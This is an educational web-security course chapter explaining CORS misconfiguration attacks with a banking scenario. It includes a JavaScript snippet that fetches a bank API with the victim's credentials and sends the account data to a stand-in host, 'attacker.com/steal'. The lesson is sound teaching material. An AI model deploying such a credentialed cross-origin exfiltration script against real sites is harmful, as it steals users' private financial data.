Notice: This page requires JavaScript to function properly.
Please enable JavaScript in your browser settings or update your browser.Learn Real-World CORS Attack Scenarios | CORS Security Risks and Real-World Scenarios
CORS Internals and Security

Real-World CORS Attack Scenarios

Swipe to show menu

Understanding how CORS can be exploited is essential for anyone responsible for web security. Attackers often look for sites with CORS misconfigurations, which can create dangerous attack vectors. These vulnerabilities allow malicious sites to interact with protected resources, bypassing the same-origin policy that browsers enforce by default. When a server trusts the wrong origins or uses overly permissive settings, attackers can leverage these weaknesses to perform actions or access data as if they were legitimate users.

Consider a scenario where a popular banking website incorrectly configures its CORS policy by allowing all origins using the wildcard "*" or by reflecting the Origin header in its response. An attacker creates a malicious website designed to lure users who are currently logged in to the bank. When a victim visits the attacker's site, hidden JavaScript code sends a cross-origin request to the bank's API endpoint that returns sensitive account information. Because of the misconfigured CORS headers, the browser allows the attacker's JavaScript to read the response, exposing confidential user data such as account balances or transaction history. This type of vulnerability can have severe consequences, including identity theft or financial loss.

// Malicious site JavaScript exploiting vulnerable CORS configuration
fetch("https://vulnerable-bank.com/api/account", {
  credentials: "include"
})
  .then(response => response.json())
  .then(data => {
    // Attacker steals sensitive account data
    fetch("https://attacker.com/steal", {
      method: "POST",
      body: JSON.stringify(data),
      headers: { "Content-Type": "application/json" }
    });
  });

In the attack example above, the attacker’s site sends a fetch request to the bank’s API while the victim is logged in. The credentials: "include" option ensures that the victim’s authentication cookies are sent with the request. If the bank’s server responds with CORS headers that allow the attacker's origin or use a wildcard, the browser grants the JavaScript access to the sensitive data in the response. The attacker’s script then forwards this data to their own server. The exploited weakness here is the server’s failure to restrict allowed origins, enabling unauthorized cross-origin access to private information.

question mark

What can an attacker achieve with a CORS misconfiguration?

Select the correct answer

Everything was clear?

How can we improve it?

Thanks for your feedback!

Section 3. Chapter 2

Ask AI

expand

Ask AI

ChatGPT

Ask anything or try one of the suggested questions to begin our chat

Section 3. Chapter 2
some-alt